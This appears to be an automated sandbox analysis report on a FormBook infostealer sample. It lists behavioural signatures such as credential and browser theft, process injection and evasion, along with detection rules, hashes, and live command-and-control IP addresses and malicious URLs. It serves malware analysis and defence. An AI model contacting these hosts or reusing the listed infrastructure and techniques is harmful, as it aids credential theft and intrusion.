Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OVZizpEU7Q.exe

Overview

General Information

Sample name:OVZizpEU7Q.exe
renamed because original name is a hash value
Original sample name:8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09.exe
Analysis ID:1587962
MD5:b5c6ac313fa5167296fbe879f26c4e0f
SHA1:d03372158b51e7c5925b372758a52ea118d5e09b
SHA256:8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09
Tags:exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • OVZizpEU7Q.exe (PID: 6092 cmdline: "C:\Users\user\Desktop\OVZizpEU7Q.exe" MD5: B5C6AC313FA5167296FBE879F26C4E0F)
    • svchost.exe (PID: 4580 cmdline: "C:\Users\user\Desktop\OVZizpEU7Q.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CkszoACLEZHP.exe (PID: 4680 cmdline: "C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • choice.exe (PID: 6764 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
          • firefox.exe (PID: 5400 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • armsvc.exe (PID: 4672 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 43F9E491CFEB42E75ED6C50912305629)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ParentImage: C:\Users\user\Desktop\OVZizpEU7Q.exe, ParentProcessId: 6092, ParentProcessName: OVZizpEU7Q.exe, ProcessCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ProcessId: 4580, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ParentImage: C:\Users\user\Desktop\OVZizpEU7Q.exe, ParentProcessId: 6092, ParentProcessName: OVZizpEU7Q.exe, ProcessCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ProcessId: 4580, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:51:08.387989+010020181411A Network Trojan was detected54.244.188.17780192.168.2.549739TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:51:08.387989+010020377711A Network Trojan was detected54.244.188.17780192.168.2.549739TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:51:59.687647+010028554651A Network Trojan was detected192.168.2.549993217.70.184.5080TCP
                2025-01-10T19:52:24.180350+010028554651A Network Trojan was detected192.168.2.549999154.23.184.20780TCP
                2025-01-10T19:52:38.718025+010028554651A Network Trojan was detected192.168.2.55000438.165.29.23480TCP
                2025-01-10T19:52:54.928853+010028554651A Network Trojan was detected192.168.2.55000913.248.169.4880TCP
                2025-01-10T19:53:08.871146+010028554651A Network Trojan was detected192.168.2.550013156.251.17.22480TCP
                2025-01-10T19:53:22.226767+010028554651A Network Trojan was detected192.168.2.550019194.245.148.18980TCP
                2025-01-10T19:53:36.178966+010028554651A Network Trojan was detected192.168.2.55002338.181.21.17880TCP
                2025-01-10T19:53:50.554403+010028554651A Network Trojan was detected192.168.2.550027185.104.45.15780TCP
                2025-01-10T19:54:04.620578+010028554651A Network Trojan was detected192.168.2.550031209.74.77.10780TCP
                2025-01-10T19:54:18.487766+010028554651A Network Trojan was detected192.168.2.550035147.255.21.18780TCP
                2025-01-10T19:54:32.152320+010028554651A Network Trojan was detected192.168.2.550039185.68.16.16080TCP
                2025-01-10T19:54:45.742263+010028554651A Network Trojan was detected192.168.2.550043194.195.220.4180TCP
                2025-01-10T19:54:59.022957+010028554651A Network Trojan was detected192.168.2.55004963.250.43.13480TCP
                2025-01-10T19:55:12.761690+010028554651A Network Trojan was detected192.168.2.55005313.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:52:16.251612+010028554641A Network Trojan was detected192.168.2.549996154.23.184.20780TCP
                2025-01-10T19:52:19.076856+010028554641A Network Trojan was detected192.168.2.549997154.23.184.20780TCP
                2025-01-10T19:52:21.667451+010028554641A Network Trojan was detected192.168.2.549998154.23.184.20780TCP
                2025-01-10T19:52:31.116320+010028554641A Network Trojan was detected192.168.2.55000138.165.29.23480TCP
                2025-01-10T19:52:33.663273+010028554641A Network Trojan was detected192.168.2.55000238.165.29.23480TCP
                2025-01-10T19:52:36.210109+010028554641A Network Trojan was detected192.168.2.55000338.165.29.23480TCP
                2025-01-10T19:52:44.231988+010028554641A Network Trojan was detected192.168.2.55000613.248.169.4880TCP
                2025-01-10T19:52:46.767778+010028554641A Network Trojan was detected192.168.2.55000713.248.169.4880TCP
                2025-01-10T19:52:49.323291+010028554641A Network Trojan was detected192.168.2.55000813.248.169.4880TCP
                2025-01-10T19:53:01.207547+010028554641A Network Trojan was detected192.168.2.550010156.251.17.22480TCP
                2025-01-10T19:53:03.758559+010028554641A Network Trojan was detected192.168.2.550011156.251.17.22480TCP
                2025-01-10T19:53:06.289658+010028554641A Network Trojan was detected192.168.2.550012156.251.17.22480TCP
                2025-01-10T19:53:14.544472+010028554641A Network Trojan was detected192.168.2.550015194.245.148.18980TCP
                2025-01-10T19:53:17.094264+010028554641A Network Trojan was detected192.168.2.550017194.245.148.18980TCP
                2025-01-10T19:53:19.753906+010028554641A Network Trojan was detected192.168.2.550018194.245.148.18980TCP
                2025-01-10T19:53:28.544446+010028554641A Network Trojan was detected192.168.2.55002038.181.21.17880TCP
                2025-01-10T19:53:31.091227+010028554641A Network Trojan was detected192.168.2.55002138.181.21.17880TCP
                2025-01-10T19:53:33.664998+010028554641A Network Trojan was detected192.168.2.55002238.181.21.17880TCP
                2025-01-10T19:53:41.983812+010028554641A Network Trojan was detected192.168.2.550024185.104.45.15780TCP
                2025-01-10T19:53:44.516218+010028554641A Network Trojan was detected192.168.2.550025185.104.45.15780TCP
                2025-01-10T19:53:47.082130+010028554641A Network Trojan was detected192.168.2.550026185.104.45.15780TCP
                2025-01-10T19:53:57.193009+010028554641A Network Trojan was detected192.168.2.550028209.74.77.10780TCP
                2025-01-10T19:53:59.570024+010028554641A Network Trojan was detected192.168.2.550029209.74.77.10780TCP
                2025-01-10T19:54:02.179232+010028554641A Network Trojan was detected192.168.2.550030209.74.77.10780TCP
                2025-01-10T19:54:10.812551+010028554641A Network Trojan was detected192.168.2.550032147.255.21.18780TCP
                2025-01-10T19:54:13.396942+010028554641A Network Trojan was detected192.168.2.550033147.255.21.18780TCP
                2025-01-10T19:54:15.952941+010028554641A Network Trojan was detected192.168.2.550034147.255.21.18780TCP
                2025-01-10T19:54:24.475560+010028554641A Network Trojan was detected192.168.2.550036185.68.16.16080TCP
                2025-01-10T19:54:27.008097+010028554641A Network Trojan was detected192.168.2.550037185.68.16.16080TCP
                2025-01-10T19:54:29.535162+010028554641A Network Trojan was detected192.168.2.550038185.68.16.16080TCP
                2025-01-10T19:54:38.029241+010028554641A Network Trojan was detected192.168.2.550040194.195.220.4180TCP
                2025-01-10T19:54:40.584163+010028554641A Network Trojan was detected192.168.2.550041194.195.220.4180TCP
                2025-01-10T19:54:43.102110+010028554641A Network Trojan was detected192.168.2.550042194.195.220.4180TCP
                2025-01-10T19:54:51.454431+010028554641A Network Trojan was detected192.168.2.55004663.250.43.13480TCP
                2025-01-10T19:54:53.942443+010028554641A Network Trojan was detected192.168.2.55004763.250.43.13480TCP
                2025-01-10T19:54:56.687333+010028554641A Network Trojan was detected192.168.2.55004863.250.43.13480TCP
                2025-01-10T19:55:04.939607+010028554641A Network Trojan was detected192.168.2.55005013.248.169.4880TCP
                2025-01-10T19:55:07.682523+010028554641A Network Trojan was detected192.168.2.55005113.248.169.4880TCP
                2025-01-10T19:55:10.037635+010028554641A Network Trojan was detected192.168.2.55005213.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T19:51:08.322943+010028508511Malware Command and Control Activity Detected192.168.2.54973954.244.188.17780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: OVZizpEU7Q.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://54.244.188.177/8#Avira URL Cloud: Label: malware
                Source: http://www.duwixushx.xyz/u11p/Avira URL Cloud: Label: malware
                Source: http://www.44ynh.top/tw1g/Avira URL Cloud: Label: malware
                Source: http://www.sunnyz.store/px6j/?bbg=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKIcNk+JBVCRg1ULnR0r9g0wTL26GmNj8vjUZJtELrX7TXSA==&4Hph=tXCXkpKPTAvira URL Cloud: Label: malware
                Source: http://54.244.188.177/Avira URL Cloud: Label: malware
                Source: http://54.244.188.177/wlyolqtsAvira URL Cloud: Label: malware
                Source: http://54.244.188.177/rO#Avira URL Cloud: Label: malware
                Source: http://54.244.188.177/y#Avira URL Cloud: Label: malware
                Source: http://www.44ynh.top/tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPTAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
                Multi AV Scanner detection for submitted file
                Source: OVZizpEU7Q.exeVirustotal: Detection: 73%Perma Link
                Source: OVZizpEU7Q.exeReversingLabs: Detection: 86%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: OVZizpEU7Q.exeJoe Sandbox ML: detected
                Source: OVZizpEU7Q.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2286369112.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CkszoACLEZHP.exe, 00000006.00000002.4758052353.000000000081E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                barindex
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49739 -> 54.244.188.177:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49993 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50013 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50009 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50023 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50038 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50042 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50036 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50039 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50041 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 185.104.45.157:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50043 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50046 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50047 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50040 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 185.104.45.157:80
